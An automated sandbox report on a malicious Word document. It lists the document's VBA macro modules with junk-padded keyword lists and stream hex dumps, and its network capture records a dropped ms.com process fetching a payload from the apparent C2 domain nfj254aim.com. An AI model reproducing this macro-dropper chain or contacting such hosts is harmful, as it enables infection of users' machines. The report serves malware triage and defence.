unadulterated
comfort
hybrid
Munich
brandon
delay
located
actors
commentary
akSqK
cubic
stacy
photographers
Airport
characters
dappled
chris
mangrove
knack
Generates
statute
Attorney
coupling
navel
Pyramid
steady
bakery
Boolean
Terrace
Verzeichnis
turnpike

VBA Code

VBA File Name: aH8xms.bas, Stream Size: 863

General
Stream Path:	VBA/aH8xms
VBA File Name:	aH8xms.bas
Stream Size:	863
Data ASCII:	. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 11 03 00 00 00 00 00 00 01 00 00 00 0e 35 b2 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
awAlq
Attribute
AutoOpen()
VB_Name

VBA Code

VBA File Name: aIsb7.bas, Stream Size: 5040

General
Stream Path:	VBA/aIsb7
VBA File Name:	aIsb7.bas
Stream Size:	5040
Data ASCII:	. . . . . . . . . : . . . . . . . . . . . . . . . A . . . 1 . . . . . . . . . . . . 5 . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 3a 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 06 00 00 31 0f 00 00 00 00 00 00 01 00 00 00 0e 35 df 77 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Blackmail
developer
valuation
plume
aMslO(aucpr)
amZcqK
Berkeley
plenipotentiary
translations
aYzBn
roundabout
aVzRp()
(akSqK(aucpr))
Pronoun
aCqnt
positions
teams
purveyor
arthur
louis
soviet
Tatiana
axSiN
motherboard
numeric
Idiom
perspective
dialectic
shallows
gazette
Discovery
felony
unconvinced
roller
Proven
medicare
ElseIf
clime
cartwright
importunate
moiety
guess
Bulldog
adeKx
Bereavement
asses
participated
Waylaid
confiscate
grandchildren
Barely
axSiN()
Shutter
Coiled
realty
compute
Precedence
vapid
Attribute
handcuffs
aaqRT
transparency
specialized
propaganda
VB_Name
calvin
telephony
everyday
Function
baste
demesne
switching
Springer
Modes
Luggage
Avant
catalog
Milky
hearthstone
tracy
expand
aMslO
Johns
sunset
requires

VBA Code

VBA File Name: aOMv0.bas, Stream Size: 3156

General
Stream Path:	VBA/aOMv0
VBA File Name:	aOMv0.bas
Stream Size:	3156
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 k > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 11 09 00 00 00 00 00 00 01 00 00 00 0e 35 6b 3e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
causes
anFJy
exclusively
Truly
Browser
aYzBn(aDKIk,
smell
Searched
adBRr(anFJy)
Surrounding
recommendations
nazarene
Constitutes
proteins
delegation
String
aMnjk
commentator
zoological
trunk
Juvenile
pearly
ElseIf
Insider
learning
Oreilly
Asc(aMnjk)
Treasurer
alfred
aDKIk
Integer
limousine
Alexander
Respiratory
aJjwu)
abomination
delayed
Memoirs
Attribute
ascendancy
acclaim
Imprecation
VB_Name
wampum
Etymology
undeceive
Function
priory
humanities
relatives
sufficiency
aJjwu
unless
persons
(aDKIk
elusive
Stumped
turnpike

VBA Code

VBA File Name: aRZcbw.bas, Stream Size: 4810

General
Stream Path:	VBA/aRZcbw
VBA File Name:	aRZcbw.bas
Stream Size:	4810
Data ASCII:	. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 62 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 04 00 00 b1 0d 00 00 00 00 00 00 01 00 00 00 0e 35 b6 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
uninterested
determinate
Const
serenade
fraser
unreliable
Public
Contacting
adolescence
Kinswoman
wickedly
walnut
blots
undivided
vociferous
Antigua
Librarian
Indolence
procedures
encounter
Campaign
riven
Defined
belfast
tradespeople
dizziness
Abstention
Terrorist
Maidenhead
Anniversary
phosphoric
dialectic
enemies
Dentists
String
Upskirt
Nearly
undecided
affordable
timeline
Obviously
selective
offset
const
restrictions
would
shove
nomenclature
axIuO()
Gentle
Choosing
Maine
gamma
consulting
strumpet
schooling
Metallic
dietary
stumble
landscape
Straightforward
prove
deuteronomy
ravage
Ecological
brazilian
Integer
jerky
adroitly
walter
daughter-in-law
aVzRp
shell
supporters
catering
magnanimous
Stylish
haven
assets
boarding
holland
washington
"aRZcbw"
Attribute
abortion
economies
compensation
Receptor
latch
Dysentery
Variety
expanding
VB_Name
Esquire
Fisting
aYKyQ()
collapse
Function
completeness
cambodia
branch
elliptical
Entrust
reporting
demanding
consolidation
sceptic
priced
Gamma
Sensuality
unload
cover
brooded
strings

VBA Code

VBA File Name: abh0Rg.bas, Stream Size: 4574

General
Stream Path:	VBA/abh0Rg
VBA File Name:	abh0Rg.bas
Stream Size:	4574
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 ca 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff d1 03 00 00 e1 0c 00 00 00 00 00 00 01 00 00 00 0e 35 f9 c7 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
seasonal
pointed
Trains
Cancelled
theaters
swain
fullness
Public
sulky
referring
explain
compost
Aquarium
bullet
digit
downpour
Changelog
alabaster
denounce
Candy
self-evident
Homesickness
Machinist
statistical
Primacy
FreeFile
Love-making
Truism
companies
mother-in-law
Competition
subway
analytical
walrus
greenhouse
Flaccid
Webshots
Tress
tricolor
pacific
pretension
radius
Print
Drawn
FileNumber
Breakdown
diffidence
Biology
aicyF
illusory
wikipedia
poison
adBRr
dutch
suggesting
participation
Plaza
Sanity
Gaoler
impromptu
isthmus
Amber
sender
urges
changes
#FileNumber
confidentiality
tunisia
liqueur
Simulated
coding
venues
seashore
reservation
lighthouse
swimmer
Arising
aicyF)
lambent
sloped
shortening
fahrenheit
transcendent
#FileNumber,
flexible
Winsome
Georgia
option
Forests
lazarus
labourer
bukkake
Grenada
Surplus
Attribute
avhZYf
aVOhvn
Syntax
Close
devious
engineers
cleaner
VB_Name
lichen
Outwards
stubbornly
proceeds
trusted
Function
belle
depth
highlighted
FileCopy
louisville
Inconsistency
ungracious
opposite
adBRr(avhZYf)
disagree
Indisputable
Output
classroom
notch
Abandons
allegorical
Overhung
eddies
Adultery
Intact

VBA Code

VBA File Name: adGbPA.bas, Stream Size: 4586

General
Stream Path:	VBA/adGbPA
VBA File Name:	adGbPA.bas
Stream Size:	4586
Data ASCII:	. . . . . . . . . J . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . 5 . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 4a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 51 03 00 00 f5 0c 00 00 00 00 00 00 01 00 00 00 0e 35 ee 60 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
intervals
octagonal
neigh
signs
astrology
legitimately
tittle
southwest
Technique
Matins
rejoin
Mephistopheles
intimidation
Burdensome
Responsibility
syllogism
Adobe
pounds
patrick
concave
Bequeath
Types
hesse
Select
pragmatic
excavation
magnificent
Vishnu
abolitionist
estimated
occurrence
Vassal
adkJvD
Armenia
Sanctified
dunbar
Systematically
component
Departments
modular
lucrative
Stating
Attica
derivation
attending
Bouquet
losses
leave-taking
Screens
fleshy
primal
Hybrid
)o)l)l)e)h)"),
Redden
utility
clustering
Unless
athens
totality
"adGbPA"
inferno
recurring
expiring
Sampson
languidly
Marrow
trojan
Attribute
Counsellor
Receipt
headers
Inactive
Sundown
lingo
charlotte
thirty-nine
aGSfMv()
VB_Name
Terminal
overran
Wicked
Function
silhouette
recovery
Mario
Infringement
Ticket
pichunter
chemist
Blue-black
brainless
cliff
complacent
compendium
aGSfMv
defilement
annuity
register
foundry
Displacement
remonstrate

VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 618

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	618
Entropy:	5.34267626544
Base64 Encoded:	True
Data ASCII:	I D = " { 8 6 2 6 2 4 0 6 - 3 0 4 D - 4 E F A - A 4 4 C - C 5 5 4 C 4 7 8 6 1 3 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a H 8 x m s . . M o d u l e = a R Z c b w . . M o d u l e = a b h 0 R g . . M o d u l e = a 7 A 5 m . . M o d u l e = a d G b P A . . M o d u l e = a I s b 7 . . M o d u l e = a O M v 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 C
Data Raw:	49 44 3d 22 7b 38 36 32 36 32 34 30 36 2d 33 30 34 44 2d 34 45 46 41 2d 41 34 34 43 2d 43 35 35 34 43 34 37 38 36 31 33 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 48 38 78 6d 73 0d 0a 4d 6f 64 75 6c 65 3d 61 52 5a 63 62 77 0d 0a 4d 6f 64 75 6c 65 3d 61 62 68 30 52 67 0d 0a 4d 6f 64 75

Stream Path: PROJECTwm, File Type: data, Stream Size: 179

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	179
Entropy:	3.66892704793
Base64 Encoded:	True
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a H 8 x m s . a . H . 8 . x . m . s . . . a R Z c b w . a . R . Z . c . b . w . . . a b h 0 R g . a . b . h . 0 . R . g . . . a 7 A 5 m . a . 7 . A . 5 . m . . . a d G b P A . a . d . G . b . P . A . . . a I s b 7 . a . I . s . b . 7 . . . a O M v 0 . a . O . M . v . 0 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 48 38 78 6d 73 00 61 00 48 00 38 00 78 00 6d 00 73 00 00 00 61 52 5a 63 62 77 00 61 00 52 00 5a 00 63 00 62 00 77 00 00 00 61 62 68 30 52 67 00 61 00 62 00 68 00 30 00 52 00 67 00 00 00 61 37 41 35 6d 00 61 00 37 00 41 00 35 00 6d 00 00 00 61 64 47 62 50 41 00 61

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4172

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4172
Entropy:	4.76403916663
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2119

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2119
Entropy:	3.47748136877
Base64 Encoded:	True
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . A . . . . . . V H . . . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 230

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	230
Entropy:	1.75961915218
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	348
Entropy:	1.78450864632
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	106
Entropy:	1.35911194617
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 775

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	775
Entropy:	6.59935768005
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
Data Raw:	01 03 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 95 d8 b6 61 10 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 10:17:50.023014069 CET	49165	80	192.168.2.22	104.28.7.227
Dec 3, 2020 10:17:50.049793005 CET	80	49165	104.28.7.227	192.168.2.22
Dec 3, 2020 10:17:50.049907923 CET	49165	80	192.168.2.22	104.28.7.227
Dec 3, 2020 10:17:50.051737070 CET	49165	80	192.168.2.22	104.28.7.227
Dec 3, 2020 10:17:50.078305960 CET	80	49165	104.28.7.227	192.168.2.22
Dec 3, 2020 10:17:50.553350925 CET	80	49165	104.28.7.227	192.168.2.22
Dec 3, 2020 10:17:50.553472042 CET	80	49165	104.28.7.227	192.168.2.22
Dec 3, 2020 10:17:50.553716898 CET	49165	80	192.168.2.22	104.28.7.227
Dec 3, 2020 10:19:39.927777052 CET	49165	80	192.168.2.22	104.28.7.227
Dec 3, 2020 10:19:39.954610109 CET	80	49165	104.28.7.227	192.168.2.22
Dec 3, 2020 10:19:39.954713106 CET	49165	80	192.168.2.22	104.28.7.227

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 10:17:49.918186903 CET	52197	53	192.168.2.22	8.8.8.8
Dec 3, 2020 10:17:49.956623077 CET	53	52197	8.8.8.8	192.168.2.22
Dec 3, 2020 10:17:49.957684994 CET	52197	53	192.168.2.22	8.8.8.8
Dec 3, 2020 10:17:49.996907949 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 3, 2020 10:17:49.918186903 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	nfj254aim.com	A (IP address)	IN (0x0001)
Dec 3, 2020 10:17:49.957684994 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	nfj254aim.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 3, 2020 10:17:49.956623077 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	nfj254aim.com	104.28.7.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:17:49.956623077 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	nfj254aim.com	104.28.6.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:17:49.956623077 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	nfj254aim.com	172.67.164.220	A (IP address)	IN (0x0001)
Dec 3, 2020 10:17:49.996907949 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	nfj254aim.com	104.28.7.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:17:49.996907949 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	nfj254aim.com	172.67.164.220	A (IP address)	IN (0x0001)
Dec 3, 2020 10:17:49.996907949 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	nfj254aim.com	104.28.6.227	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

nfj254aim.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	104.28.7.227	80	C:\Users\Public\ms.com

Timestamp	kBytes transferred	Direction	Data
Dec 3, 2020 10:17:50.051737070 CET	1	OUT	GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: nfj254aim.com Connection: Keep-Alive
Dec 3, 2020 10:17:50.553350925 CET	2	IN	HTTP/1.1 200 OK Date: Thu, 03 Dec 2020 09:17:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d22f56ec96c6f03715d1ce936958387bc1606987070; expires=Sat, 02-Jan-21 09:17:50 GMT; path=/; domain=.nfj254aim.com; HttpOnly; SameSite=Lax X-Powered-By: PHP/7.2.34 CF-Cache-Status: DYNAMIC cf-request-id: 06c97dd26f0000f9e6421d2000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xMtPQ%2FL0HMOQqJ6n0i7dF%2BbT1lj4NdCsTctUdAcqEyAJXo2SyZC4S0VKMQ%2BvNmFO5pISy8Y3YujV8dsp2OsJ%2BAJoVP7O5KmnrbbOIVbN"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fbc3263ec79f9e6-PRG Content-Encoding: gzip Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3f 0f 82 30 14 c4 f7 7e 8a 27 bb 3c 20 8c 2f 1d 14 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d fe f9 f6 06 58 5c ef ee 77 77 b4 49 4e 7b 71 a9 52 38 88 63 01 55 bd 2b f2 3d 78 5b c4 3c 15 19 62 22 92 d5 89 fc 00 31 2d 3d ce 48 bb 47 c7 49 ab 46 72 46 ae 75 9d e2 71 10 43 69 1c 64 66 ea 25 e1 2a 32 c2 25 44 57 23 bf 33 17 f2 bf 8c 0e 39 a3 81 0b ad 60 54 cf 49 59 a7 24 d4 e7 02 bc 8f 1d 6e 32 f2 e0 dd 58 e8 8d 83 fb 0c 80 e9 c1 e9 d6 82 55 e3 4b 8d 3e e1 30 0f 2c d5 84 cb 25 f6 03 00 00 ff ff 03 00 0c 45 8d 50 cd 00 00 00 0d 0a Data Ascii: baL?0~'< /$mMI"-X\wwIN{qR8cU+=x[<b"1-=HGIFrFuqCidf%*2%DW#39`TIY$n2XUK>0,%EP

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 584

General

Start time:	10:17:34
Start date:	03/12/2020
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fc70000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: ms.com PID: 1276 Parent PID: 1220

General

Start time:	10:17:36
Start date:	03/12/2020
Path:	C:\Users\Public\ms.com
Wow64 process (32bit):	false
Commandline:	C:\users\public\ms.com C:\users\public\ms.html
Imagebase:	0x13fea0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

